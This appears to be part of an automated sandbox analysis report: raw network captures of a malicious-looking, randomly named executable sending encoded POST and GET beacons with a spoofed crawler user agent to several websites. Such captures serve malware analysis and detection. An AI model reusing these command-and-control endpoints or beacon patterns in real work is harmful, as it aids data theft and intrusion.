Jul 8, 2024 07:22:47.332504988 CEST	1236	IN	Data Raw: 58 b7 7e be 7b d6 55 a6 3e 98 9a 7b 5d 60 fd ec dd e8 a7 d6 d9 8f fe 4f 5f 8c 5e 8d de b7 5e fd f8 f3 e5 ab 57 af c3 8e f3 e3 ff 7a f7 76 1a b9 5f 5b 5f 74 96 f6 8f e3 7b e6 fb de 75 dc 96 7c bf ff f9 c3 f0 7d ef 0a 6e 4b be a7 5f 37 2f 3e 04 df Data Ascii: X~{U>{]`O_^^Wzv_[_t{u\|}nK_7/>0\|jk^e/s}'8woXw:[uk_X&{!\40?0"U`+$W=x\|?`cwqL?T3^~62P{eZULolk0wD
Jul 8, 2024 07:22:47.332519054 CEST	1236	IN	Data Raw: b1 04 55 89 11 3e ac d2 76 ac 7d e9 9e b9 ec d9 cc f5 1c 76 56 6f d6 ad 9a 30 32 6b 53 ee e3 5c 12 84 b5 86 2a 6e b2 46 a3 19 e7 f1 2e 7a 69 ee a2 9a 73 1d 9c 9d d0 2f 33 69 00 3d 31 60 56 c9 6a 1b 0b 6f 39 75 c1 6c ce 8a a3 9f a6 f2 95 d4 67 1d Data Ascii: U>v}vVo02kS\nF.zis/3i=1`Vjo9ulg}78hGBb9w\xBaCxO;"`q7r8e^3WL\tY8kN=-d/^`^w]qf{q1s4nd:vxdN]@p,
Jul 8, 2024 07:22:47.332530022 CEST	1236	IN	Data Raw: 07 6b c5 07 62 02 29 09 f9 ad 1f 32 d4 54 2d ab 07 1c f4 14 ea 81 ca 2e 50 df 59 db 69 45 6d 64 69 d8 cb 8b 35 35 01 0b c0 56 b3 d7 cd 3a 05 a4 75 ba f0 ff 3e eb 26 95 83 94 2c a3 d7 da b8 8f 3a cb e8 74 03 16 db 46 b3 d9 ca 58 3c 3a 42 a5 d0 3c Data Ascii: kb)2T-.PYiEmdi55V:u>&,:tFX<:B<je5@Oh]W5`hCugH=J=PYk&?cL[-12mjfkm7/WaT[G)&nEiF`y}FvR%n]kYhUg**gVaY&4Ww1
Jul 8, 2024 07:22:47.332541943 CEST	672	IN	Data Raw: c3 a9 5c 82 f0 ed 33 77 4a 9b 9b 6c fd ce af 9c a5 93 ed d4 eb 9d 92 83 2c 5e 70 4c 3d f8 f4 27 62 c2 3b 6f 50 76 ae ad 2a ab 9c 94 25 65 cb 15 03 69 cb b9 1f e9 ab 6c 69 eb 2b 17 51 6a a2 22 8a 9c 32 ef 7a 45 f2 4d 3a b8 cb 6d 35 37 eb bd 81 ea Data Ascii: \3wJl,^pL='b;oPv*%eili+Qj"2zEM:m57qX}ft)w7Q#`d},KQgM5p9OafdUOwlM!A4qBwf[ecHy$]yyx\qk!K9[Qu,@zx"9\^7M)^ox
Jul 8, 2024 07:22:47.332559109 CEST	1236	IN	Data Raw: 65 ce ef 32 e1 2a f1 69 a9 d5 06 c9 c7 02 ae 44 68 e8 a1 c6 2c d6 c6 33 60 f5 8e 51 37 bd 67 92 3b 2b 46 f0 eb fe 24 18 2f a3 ab 54 b4 d7 d0 55 4a a7 c3 c4 73 3c 03 89 4c 67 d7 d0 b6 57 01 48 0e dd 43 c4 65 95 d4 67 1f 11 4e dc e9 32 cc ee 5c 5c Data Ascii: e2*iDh,3`Q7g;+F$/TUJs<LgWHCegN2\\+g/`$:$7+/3`i;ICzF1_Q}/_q[:BEy9>C@g@.t.zjDE\F9Px!%}0f2(<
Jul 8, 2024 07:22:47.332672119 CEST	1236	IN	Data Raw: 4a 82 98 0a 59 6e a7 85 c4 df 87 81 97 05 fe 40 51 e1 cd 26 ec af b9 05 01 59 ec 0a 2d 41 89 96 20 4f 4b 50 a4 25 28 d2 12 68 68 e1 63 17 a3 c2 28 e9 a9 4d 00 8b 3a 58 e6 94 28 5d 49 e5 d2 63 9e ab 95 1b a6 03 01 8a 99 8c f8 50 e8 56 91 51 3d 8a Data Ascii: JYn@Q&Y-A OKP%(hhc(M:X(]IcPVQ=@(0OLY'-2REL'xiN~4dtw&jD,qber9>U3&.z!NQ#Ept}_HfIy,Zu{nXk!N5
Jul 8, 2024 07:22:47.332684040 CEST	1236	IN	Data Raw: 07 7d 32 b9 2e 97 3e e8 c7 e1 e1 75 06 ff 34 db 7a 05 23 3c 14 b8 18 7a 74 a5 65 20 67 31 82 d9 25 0c ce 69 fd ac cd c0 15 b7 9a 91 3f 4f cc 32 94 0d 01 d2 fe ac 3e e7 ef 23 1a 75 0b 1b 55 98 18 76 4c 6e f6 ae 2d 78 86 5e c2 2b 4a a1 fe a3 75 59 Data Ascii: }2.>u4z#<zte g1%i?O2>#uUvLn-x^+JuYB+4Yc>\|tXZFqOR6qR40`U}"Ji9aSp-D<^\Oq6yXrL-ZI;t]NqLT#4W(rTaH
Jul 8, 2024 07:22:47.332695961 CEST	672	IN	Data Raw: dd 6e 57 fa 1c 49 84 61 70 ae f8 14 6f e0 ab b4 62 b3 fa 0a 0f fe 52 25 91 dc 02 d5 ba 98 c8 8c 68 16 9c 8b 4d 5e 76 83 fa 98 f4 27 49 6e b2 e8 ab da bf 21 6a ad bd e7 e3 91 9d ce 7f f3 5a d9 d7 4f 14 08 6d 7f e9 b6 d4 cb 39 ab 36 11 f5 3a 35 71 Data Ascii: nWIapobR%hM^v'In!jZOm96:5qf+vKN9IV?PzU0,"m`?eJ\|k>d0TUB9: :"PI"m%4.U>?+k{\|Aeik6jO4&vS^J,2@B.
Jul 8, 2024 07:22:47.337415934 CEST	1236	IN	Data Raw: 79 d5 ba 28 0b b1 39 30 c4 d1 89 47 d1 7a 45 a6 87 e7 4e 16 23 c3 87 74 6a 22 ad 58 d0 5f 71 b0 01 0c 9d 9b 2e 46 e6 3c a0 63 20 11 f7 2e 32 83 c9 04 23 3b c2 d8 18 9f ea 36 80 94 ee b0 ea f0 41 55 02 89 4f 83 50 94 a6 98 f2 32 36 94 46 14 9b 36 Data Ascii: y(90GzEN#tj"X_q.F<c .2#;6AUOP26F6{\|Dy2k23cw?NF`-@SM\|XQ_t:rOM{M9^UV&R/opuSR3hYS?$@K]jbOF<-Re>;Q/~

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49788	5.78.41.174	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:22:48.921534061 CEST	10816	OUT	POST /6rlx/ HTTP/1.1 Host: www.411divorce.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.411divorce.com Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 10301 Referer: http://www.411divorce.com/6rlx/ User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 4d 64 45 6c 3d 64 30 78 67 47 4a 4a 54 4f 4d 6c 6b 7a 72 44 71 78 32 68 6a 78 56 30 52 63 55 53 68 41 2b 49 45 4c 71 6b 33 66 66 30 6c 62 4a 2b 54 77 67 61 4c 72 61 6f 49 53 43 59 4c 6a 6c 4c 72 4e 72 75 63 75 65 38 52 4b 71 32 4a 34 45 7a 34 44 4b 31 33 49 50 43 2f 79 78 63 73 71 4e 61 7a 76 54 74 2f 76 62 31 36 4a 5a 37 70 50 77 39 45 76 63 70 45 31 37 4b 78 6d 71 37 70 64 70 44 75 73 41 47 63 4e 6e 2f 34 64 35 56 72 53 67 62 57 62 2b 76 56 37 62 59 39 67 55 6c 69 48 38 62 32 77 42 68 77 65 62 77 69 79 6e 32 42 52 32 42 78 56 39 35 4c 41 74 6b 35 68 35 4e 44 2b 57 6b 62 67 62 4f 45 32 70 59 66 6f 35 53 65 67 54 63 59 5a 49 5a 6f 4b 39 74 69 56 31 4c 2b 77 30 4a 6c 64 65 30 34 6a 49 59 33 33 62 71 39 70 63 77 58 63 35 52 65 69 6a 76 4c 51 31 6d 62 54 67 49 30 4b 32 59 54 35 51 45 6a 66 58 42 73 55 58 4a 72 39 39 53 48 2b 73 2f 4e 53 65 75 4a 6a 78 4b 64 69 78 64 43 71 56 33 49 67 72 78 64 5a 5a 43 6c 4f 44 51 43 4c 39 48 47 59 37 36 49 6b 5a 39 78 6b 4d 33 34 52 72 70 6a 6b 4a 6a 59 5a 72 39 36 34 [TRUNCATED] Data Ascii: MdEl=d0xgGJJTOMlkzrDqx2hjxV0RcUShA+IELqk3ff0lbJ+TwgaLraoISCYLjlLrNrucue8RKq2J4Ez4DK13IPC/yxcsqNazvTt/vb16JZ7pPw9EvcpE17Kxmq7pdpDusAGcNn/4d5VrSgbWb+vV7bY9gUliH8b2wBhwebwiyn2BR2BxV95LAtk5h5ND+WkbgbOE2pYfo5SegTcYZIZoK9tiV1L+w0Jlde04jIY33bq9pcwXc5ReijvLQ1mbTgI0K2YT5QEjfXBsUXJr99SH+s/NSeuJjxKdixdCqV3IgrxdZZClODQCL9HGY76IkZ9xkM34RrpjkJjYZr964iWUJVsWjQ98hTRZnYTEiEyVwjdCLhY5NLazzGAnHXRv63Qq8sBDIfdrM86hsF9/JgwZIl+PRzYbxHiHv3v6x8+nFlgGimw9auPWBxF5sdrrac4zOqaAj4Dm+pvwFi4W5QlSN4hjlRtDdoTeD3Qwf8cLdGY2Az/sLbSQAIZ8PyCfq/81yUdR3X7zlSRx+gh77LaLs1S7zXjUqsqJ2ZtBNFl88JqOwRr9GoItYMzovI0iFsxG7AcMFl/L9wx6sXorsPuJirSLHQaYLfFpXHFKHV3/Xn1cNQrAJGHcE3nzsQVQPda/r/Z9kO0MoyOPGGCT2r86RUrq4T6s0zCTez04DASp+LG64P3uI1xy4jvmkHNntDu1Cd+wwCHvVIaF7fkFAs4/Yc9lLgVJI+t+ZJjziJGI70PFTnbu6smhtxBWQnmOxufTonxB925OwHifQIUfApbKv6LCwLswBOQ9JgADN2g48OljdEjc2QOaQ/dmyKQbDqQb5ZkOdWfv2A7NrB1VMEtxcNFbZPi8rkjzVeaXJo3FbJLyw1YCPStJojqVwAHD2OgjzS4t0AY5c8JHjT/D9xwHHc+s6YSuD1EMhRrd4IUnXYUEyWwvOXNf9+TLij6il9HY7uZZAneoCwIe3g87KcyqUapGDOf/DERbmEU0166nx6tC5HJIX1m [TRUNCATED]
Jul 8, 2024 07:22:50.015275002 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 08 Jul 2024 05:22:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: public, no-cache Link: <http://411divorce.com/wp-json/>; rel="https://api.w.org/" X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: Prometheus Pre-Cognitive-Push: Enabled Quantum-Flux-Capacity: Omega Referrer-Policy: strict-origin-when-cross-origin X-Grid-SRCache-TTL: 2592000 X-Grid-SRCache-Skip: -POST X-Grid-SRCache-Fetch: BYPASS X-Grid-SRCache-Store: BYPASS Content-Encoding: gzip Data Raw: 34 62 37 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 6b 7b db 36 d2 e8 e7 f8 79 f6 3f a0 4a 5b db 2d 29 51 57 db 52 ec dd 34 4d da 9c 6d 9b 6e 93 34 dd 5e 1e 3d 94 08 49 8c 29 52 25 29 5f ea f5 f9 2d e7 eb f9 72 7e c4 fb cb ce cc 00 24 41 12 d4 c5 97 d4 fb ee eb 36 b6 04 0c 06 33 03 60 30 00 06 83 27 1f 7d f9 ea d9 9b 7f 7e ff 9c cd e2 b9 77 b2 f3 04 ff 30 cf f6 a7 c7 35 ee 9b 6f 5f d7 30 8d db ce c9 ce a3 27 73 1e db 6c 3c b3 c3 88 c7 c7 b5 b7 6f 5e 98 87 35 d6 00 00 ca 98 c5 f1 c2 e4 bf 2f dd b3 e3 da 4f e6 db a7 e6 b3 60 be b0 63 77 e4 f1 1a 1b 07 7e cc 7d 28 f5 f2 f9 31 77 a6 bc 86 f8 3c d7 3f 65 21 f7 8e 6b 0b d7 9f 8e ec f1 69 8d cd 42 3e 39 ae 21 ae 7e a3 d1 69 36 1d f7 2c 08 c7 bc 3e 0e e6 8d 8b b9 17 2e c6 f5 c5 6c 41 d5 02 86 68 1c ba 8b 98 c5 97 0b 7e 5c 8b f9 45 dc 78 6f 9f d9 22 15 ab 78 e4 04 e3 e5 1c 2a ae 27 1f 9e 7b 9c be 8f 3d 3b 8a be b3 e7 9c 1d b3 dd f7 d1 ee 00 b0 35 44 41 28 07 5f 62 37 f6 f8 49 c7 ea b0 ef 82 98 bd 08 96 be c3 fe c5 5e 3f 7f c5 de 60 0e fb 9a 87 fc 49 43 40 [TRUNCATED] Data Ascii: 4b71}k{6y?J[-)QWR4Mmn4^=I)R%)_-r~$A63`0'}~w05o_0'sl<o^5/O`cw~}(1w<?e!kiB>9!~i6,>.lAh~\Exo"x'{=;5DA(_b7I^?`IC@8V O2F@,aEAN]8zu@fVl?2]8j'+d{}V@S7"_'.__~I?OCRc}8#Vy-<8:6!{:nb{oS?8_^gOq>7
Jul 8, 2024 07:22:50.015350103 CEST	1236	IN	Data Raw: bf 7e f3 ed 37 06 f3 dc 53 ce be e2 e3 d3 60 9f bd b6 27 76 e8 4a 80 2f ed e5 bc d1 81 0f 9f 35 fe 86 12 31 27 f6 98 b3 2b f9 11 05 d1 67 bb 28 0a 86 a2 d8 1d 50 06 c9 bd cf 04 b3 22 e9 9c bb d3 19 90 09 5c 27 30 21 8f c7 b3 3e f3 83 70 6e 7b 22 Data Ascii: ~7S`'vJ/51'+g(P"\'0!>pn{"Qg }oDlQlYj/o_}9^~~7sNw?v?q<g'%?;?a~~X~{U>{]`
Jul 8, 2024 07:22:50.015362024 CEST	1236	IN	Data Raw: fd 2b 98 fb 96 a1 5f 80 ac d7 eb 6a 82 11 26 45 af 8d 8f 6f 54 fa e3 eb c1 39 ed 54 d4 25 09 e2 8f 21 13 3f 96 df 07 48 f4 78 09 ed 3c ff 9a db ce 6b 62 27 3a fe a8 39 10 f9 f5 89 2f 21 eb a0 d5 e2 80 d8 bf 02 a2 aa 32 64 9a 1f 3c 0b fc 09 a8 8c Data Ascii: +_j&EoT9T%!?Hx<kb':9/!2d<8G;Q#h2r})!%NhMJv!7+8HDlZ=4vnm!AH0Ad/p6RYx\;OCe0`/`>[9F~3U>v}
Jul 8, 2024 07:22:50.015436888 CEST	1236	IN	Data Raw: ab d9 61 5a 62 af d9 ee 3a 7c 6a 84 d3 91 bd d7 33 9a 9d 03 a3 d5 3a 30 9a fb cc fa 04 13 f7 9a dd ae 71 d8 84 c4 ce 3e 03 7d fa c9 7e 65 d5 45 09 67 75 ab 62 ac ae 7f af d9 6a 41 3d 96 d1 3c b4 d2 ea 2d a3 65 1d 1a cd b6 b5 b6 76 4d 97 40 0a 2a Data Ascii: aZb:\|j3:0q>}~eEgubjA=<-evM@*1-kX0k4-)L4$VT%N_W'/X!e}wAav87rW\hYK6$4kb)2T-
Jul 8, 2024 07:22:50.015453100 CEST	1236	IN	Data Raw: 01 f2 0d 74 dc 0d b0 6e a8 db 6e 80 f9 06 3a ed 06 b5 dc 4e 97 dd be c2 cd 75 d8 4d ea ba 89 ee ba 71 53 6d a5 b3 6e da d5 b6 d2 55 37 66 65 73 1d 75 e3 2a 2a 75 d3 9a 33 d7 ec 58 40 71 25 50 fc 44 34 f5 6e 7c 9e bb 49 3f d4 1c c3 de 8a a4 4d 2a Data Ascii: tnn:NuMqSmnU7fesu*u3X@q%PD4n\|I?Mt<VmjXWwI?]?[_7N{oE(2:;/At7T8Vdh4u^oUOV$H45;RG:zEA] r\|7x\3wJl
Jul 8, 2024 07:22:50.015465021 CEST	1236	IN	Data Raw: 24 e2 6a cf 50 66 ea 70 0b 5d 55 ba 9b 46 ea 15 94 a8 7b a5 5c 0b 14 61 e4 ae 49 eb e2 30 51 7b e2 33 98 7c 5c 1e b2 ef f8 b9 72 8d b7 70 4d 13 07 10 e8 57 3d eb 52 5d 26 37 9d ac 7c 8f 2c 5f 46 ac 52 6f d7 88 44 d6 88 d7 87 11 f1 15 f6 99 7a 1b Data Ascii: $jPfp]UF{\aI0Q{3\|\rpMW=R]&7\|,_FRoDz8^ZZ$y7L+RSYt38L\%JP3_&J-/:z,rMzVS41PU^@k/U9`bvQDS/dnQQp8T*<BScO3
Jul 8, 2024 07:22:50.015477896 CEST	776	IN	Data Raw: ee c1 82 b8 94 64 65 78 21 06 84 48 23 f2 e0 26 b1 26 75 25 b7 22 50 53 c9 dc d9 d8 10 d3 2d 6a 07 b9 61 32 50 04 9f cc 81 b0 b8 11 f7 ca 60 55 be 0c 23 e0 7e 11 b8 22 96 0d f5 e4 a4 7a 33 89 a4 cb 16 75 3f 48 22 3f 2a 4b a6 c2 2e d3 76 a5 f5 4b Data Ascii: dex!H#&&u%"PS-ja2P`U#~"z3u?H"?K.vK&JV)>n)S)^?^=}CCILmc.X<Z&2{ri<uu])Gu)iJHZL~2\|cMKEsMR`hz i
Jul 8, 2024 07:22:50.015605927 CEST	1236	IN	Data Raw: 5c 1f 84 38 0d ed f9 aa 22 76 ae 48 18 ad c4 cf 01 d8 76 9b 7c 2c d7 88 26 3f c3 3c b1 fd 97 42 b2 5a ba d2 a0 8d b8 81 72 e6 55 e7 67 f8 d4 06 95 c3 17 2c 6c d7 8b 58 9a 48 0f 72 8c b9 e7 61 12 40 40 0b 49 98 21 c6 ea 81 3a f1 f1 93 55 79 e9 2a Data Ascii: \8"vHv\|,&?<BZrUg,lXHra@@I!:Uy*Lk'L?1GI`mTRWRs}2.>u4z#<zte g1%i?O2>#uUvLn-x^+JuYB+4Yc>\|tXZFqO
Jul 8, 2024 07:22:50.015616894 CEST	1236	IN	Data Raw: c7 30 d5 e3 0e 5c 94 37 d2 d2 1d b8 20 8a a3 a1 6f 9f 31 3b dd 60 b3 47 e9 86 88 1b cf d4 5b 7a e5 ea ee cc 64 4e 7b 4e 0a 32 9c db 51 a6 35 b2 e4 85 8d 3b 8e fe 55 fa 6a 53 f2 24 5d c9 38 0a e5 ed 34 3a a9 ab a8 a0 7c f3 90 02 f7 82 1d 99 8f e4 Data Ascii: 0\7 o1;`G[zdN{N2Q5;UjS$]84:\|%6+8O!&eK'l];IWanWIapobR%hM^v'In!jZOm96:5qf+vKN9IV?PzU0,"m`
Jul 8, 2024 07:22:50.015628099 CEST	1236	IN	Data Raw: d1 de 30 18 c5 6a 0c 3a b7 86 3c 80 c6 bd 21 0f a0 71 73 c8 03 68 dc 1d f2 00 1a b7 87 3c 80 1a cb b2 ca fd 81 6d de 98 79 19 6f da 1f 14 a1 ae 2a 82 0e 1b 85 23 09 6d 66 a5 47 c9 2a c9 e7 f2 2b fc 4b 56 c9 3d 97 5f e1 6d 52 96 ba d6 e9 44 5b 68 Data Ascii: 0j:<!qsh<myo#mfG+KV=_mRD[hM/Cn4dT*GLqj(+8)f5[hJoiA8hbOnZ5Ufj{#@)%([V]h+$Bn1w.o=uJd'._9oiKWZ2rM%3
Jul 8, 2024 07:22:50.020275116 CEST	1236	IN	Data Raw: da 3f 14 68 a8 2c de ab 95 fa 45 6d 7f 25 86 a1 bd 01 0e 66 eb b1 bc 0b d1 4e 27 2a 4a 68 a5 b2 67 7f d5 55 d9 2f 25 a6 e8 41 f3 a7 c2 90 38 d4 86 c2 9f 2c 9f 76 e7 6a a4 db a8 bb 62 9f ae 19 ac 86 00 35 45 76 95 a5 ec 71 8c 41 f6 68 f1 02 05 53 Data Ascii: ?h,Em%fN'JhgU/%A8,vjb5EvqAhS_>^w.pXkT]Wu8`6CwsovKo{%zu?Tj`SuR_-o#Jo't4$=!E,frvb5~>;w}'8S

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49789	5.78.41.174	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:22:51.457643032 CEST	452	OUT	GET /6rlx/?MdEl=Q2ZAF+B5MPpYnKbk8zx56B5rL1aOA7pZYrcwSpUNeInn+zCIhLxwZygB7Wu/ELLY+MlDUKKO21LBMLVVY53WlSV2qsC0iw14ssBnKMCkfzBn744B3pSPmJk=&cv4D=Bv0xSH88iTF48zS0 HTTP/1.1 Host: www.411divorce.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Jul 8, 2024 07:22:52.289011002 CEST	991	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 08 Jul 2024 05:22:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: public, no-cache X-Redirect-By: WordPress Location: http://411divorce.com/6rlx/?MdEl=Q2ZAF+B5MPpYnKbk8zx56B5rL1aOA7pZYrcwSpUNeInn+zCIhLxwZygB7Wu/ELLY+MlDUKKO21LBMLVVY53WlSV2qsC0iw14ssBnKMCkfzBn744B3pSPmJk=&cv4D=Bv0xSH88iTF48zS0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: Prometheus Pre-Cognitive-Push: Enabled Quantum-Flux-Capacity: Omega Referrer-Policy: strict-origin-when-cross-origin X-Grid-SRCache-TTL: 2592000 X-Grid-SRCache-Skip: -query_string X-Grid-SRCache-Fetch: BYPASS X-Grid-SRCache-Store: BYPASS Data Raw: 62 62 0d 0a 0a 3c 21 2d 2d 43 61 63 68 65 64 20 75 73 69 6e 67 20 4e 67 69 6e 78 2d 48 65 6c 70 65 72 20 6f 6e 20 32 30 32 34 2d 30 37 2d 30 38 20 30 30 3a 32 32 3a 35 32 2e 20 49 74 20 74 6f 6f 6b 20 35 34 20 71 75 65 72 69 65 73 20 65 78 65 63 75 74 65 64 20 69 6e 20 30 2e 31 36 39 20 73 65 63 6f 6e 64 73 2e 2d 2d 3e 0a 3c 21 2d 2d 56 69 73 69 74 20 68 74 74 70 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 65 78 74 65 6e 64 2f 70 6c 75 67 69 6e 73 2f 6e 67 69 6e 78 2d 68 65 6c 70 65 72 2f 66 61 71 2f 20 66 6f 72 20 6d 6f 72 65 20 64 65 74 61 69 6c 73 2d 2d 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: bb...Cached using Nginx-Helper on 2024-07-08 00:22:52. It took 54 queries executed in 0.169 seconds.-->...Visit http://wordpress.org/extend/plugins/nginx-helper/faq/ for more details-->0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49790	64.46.102.70	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:22:57.761646986 CEST	708	OUT	POST /aiec/ HTTP/1.1 Host: www.sgbet777.org Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.sgbet777.org Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 201 Referer: http://www.sgbet777.org/aiec/ User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 4d 64 45 6c 3d 54 6d 37 52 46 41 35 4a 38 75 43 46 4e 6f 37 34 51 35 34 70 6e 64 34 6c 79 36 2f 6a 65 48 63 50 6b 64 38 42 50 65 41 4f 72 63 42 71 4f 32 52 65 58 34 7a 4a 6d 39 57 76 58 50 43 59 44 48 4c 78 33 79 58 47 76 33 55 67 65 43 57 70 37 38 63 65 2f 2f 47 63 32 4d 55 48 65 64 74 33 79 57 44 49 4a 52 46 4e 37 6a 33 67 59 61 4c 75 4f 36 78 57 30 33 78 6b 76 4c 75 49 56 76 59 4b 67 6f 73 69 43 34 4f 71 42 35 51 6a 62 6a 38 31 50 46 39 56 44 55 32 34 31 53 35 54 48 73 66 59 6b 30 54 34 6f 52 2f 62 2f 2f 39 4d 77 73 5a 38 45 38 70 36 63 30 41 6e 51 48 4c 75 37 67 35 57 46 51 66 6b 50 77 3d 3d Data Ascii: MdEl=Tm7RFA5J8uCFNo74Q54pnd4ly6/jeHcPkd8BPeAOrcBqO2ReX4zJm9WvXPCYDHLx3yXGv3UgeCWp78ce//Gc2MUHedt3yWDIJRFN7j3gYaLuO6xW03xkvLuIVvYKgosiC4OqB5Qjbj81PF9VDU241S5THsfYk0T4oR/b//9MwsZ8E8p6c0AnQHLu7g5WFQfkPw==
Jul 8, 2024 07:22:58.218817949 CEST	479	IN	HTTP/1.1 404 Not Found Date: Mon, 08 Jul 2024 05:22:58 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49791	64.46.102.70	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:23:00.316860914 CEST	728	OUT	POST /aiec/ HTTP/1.1 Host: www.sgbet777.org Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.sgbet777.org Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 221 Referer: http://www.sgbet777.org/aiec/ User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 4d 64 45 6c 3d 54 6d 37 52 46 41 35 4a 38 75 43 46 4d 4c 7a 34 44 4f 45 70 79 4e 34 6b 72 36 2f 6a 4a 58 63 4c 6b 64 77 42 50 61 59 6e 72 75 6c 71 4e 58 68 65 57 36 4c 4a 68 39 57 76 63 76 43 64 4f 6e 4c 4d 33 79 54 34 76 32 34 67 65 44 79 70 37 34 51 65 34 4f 47 62 33 63 55 46 4c 74 74 31 38 32 44 49 4a 52 46 4e 37 6a 6a 4b 59 63 6a 75 4f 4b 42 57 6c 6a 6c 6a 68 72 75 50 43 66 59 4b 6b 6f 73 6d 43 34 50 39 42 37 6b 4a 62 6d 34 31 50 41 52 56 44 46 32 37 37 53 35 4a 4b 4d 65 45 74 31 4b 41 77 6b 4b 79 77 73 38 69 36 39 34 62 49 61 34 67 4e 46 68 77 43 48 76 64 6d 6e 77 69 49 54 69 74 55 33 2b 56 4c 39 54 6c 71 32 6d 41 46 7a 4e 41 2b 75 66 61 69 65 49 3d Data Ascii: MdEl=Tm7RFA5J8uCFMLz4DOEpyN4kr6/jJXcLkdwBPaYnrulqNXheW6LJh9WvcvCdOnLM3yT4v24geDyp74Qe4OGb3cUFLtt182DIJRFN7jjKYcjuOKBWljljhruPCfYKkosmC4P9B7kJbm41PARVDF277S5JKMeEt1KAwkKyws8i694bIa4gNFhwCHvdmnwiITitU3+VL9Tlq2mAFzNA+ufaieI=
